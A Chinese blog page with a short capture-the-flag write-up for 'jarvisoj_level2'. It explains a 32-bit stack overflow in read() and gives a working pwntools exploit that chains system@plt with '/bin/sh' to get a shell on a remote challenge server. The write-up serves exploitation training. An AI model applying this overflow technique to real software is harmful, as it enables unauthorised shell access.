当前位置:网站首页>jarvisoj_level2
jarvisoj_level2
2022-06-24 06:43:00 【[mzq]】
jarvisoj_level2

32位没有开canary 然后程序的read函数有溢出 可以执行栈溢出操作
main函数 这个调用了system 函数所以plt表中是有system的地址的

vulnerable function函数 read发生溢出 &buf 栈上只有0x88,然而却读入了0x100
,造成我们可以覆盖栈上ebp return address 的值.


exp
from pwn import *
#io = process("./level2")
io = remote("node4.buuoj.cn",27209)
elf = ELF("./level2")
context(log_level="debug",arch="i386")
system_plt = elf.plt["system"]
binsh = next(elf.search("/bin/sh"))
payload = flat(["a"*0x88,"iebp",system_plt,0,binsh])
io.sendline(payload)
io.interactive()

边栏推荐
- PCL point cloud random sampling by ratio
- 0 foundation a literature club low code development member management applet (6)
- bjdctf_2020_babystack
- FreeRTOS MPU makes the system more robust!
- 2022蓝队HW初级面试题总结
- JVM调试工具-jvisualvm
- [DDCTF2018](╯°□°)╯︵ ┻━┻
- Can the small fire Chunfeng tea make its debut by "keeping fit"?
- 【帧率倍频】基于FPGA的视频帧率倍频系统verilog开发实现
- JVM调试工具-Arthas
猜你喜欢

In JS, the regular expression verifies the hour and minute, and converts the input string to the corresponding hour and minute

2022蓝队HW初级面试题总结

Win11怎么设置让CPU性能全开?Win11CPU怎么设置高性能模式?

【图像融合】基于像素显着性结合小波变换实现多焦点和多光谱图像融合附matlab代码

在js中正则表达式验证小时分钟,将输入的字符串转换为对应的小时和分钟

伦敦金的资金管理比其他都重要

Intelligent Vision Group A4 paper recognition example

Mysql开启BINLOG

【图像分割】基于形态学实现视网膜血管分割附matlab代码
![[MRCTF2020]千层套路](/img/8e/d7b6e7025b87ea0f43a6123760a113.png)
[MRCTF2020]千层套路
随机推荐
【WordPress建站】6. 文章内容防复制
在终端pip install xxx但在pycharm却no module named xxx
Unexpected token u in JSON at position 0
【图像分割】基于形态学实现视网膜血管分割附matlab代码
Are internal consultants and external consultants in SAP implementation projects difficult or successful? [English version]
Face pincher: a hot meta universe stylist
关于取模数据序号定位的说明 区码定位是指GBK编码
The first common node of two linked lists_ The entry of the link in the linked list (Sword finger offer)
0 foundation a literature club low code development member management applet (I)
【TS】函数类型
JVM debugging tool -jvisualvm
0 foundation a literature club low code development member management applet (5)
In the middle of the year, I have prepared a small number of automated interview questions. Welcome to the self-test
伦敦金的资金管理比其他都重要
Summary of 2022 blue team HW elementary interview questions
Smart space 𞓜 visualization of operation of digital twin cargo spacecraft
现货黄金有哪些眩人的小技术?
Vmware tools still exist after normal uninstallation for many times. How to solve it
Multi sensor fusion track fusion
Precipitation of architecture design methodology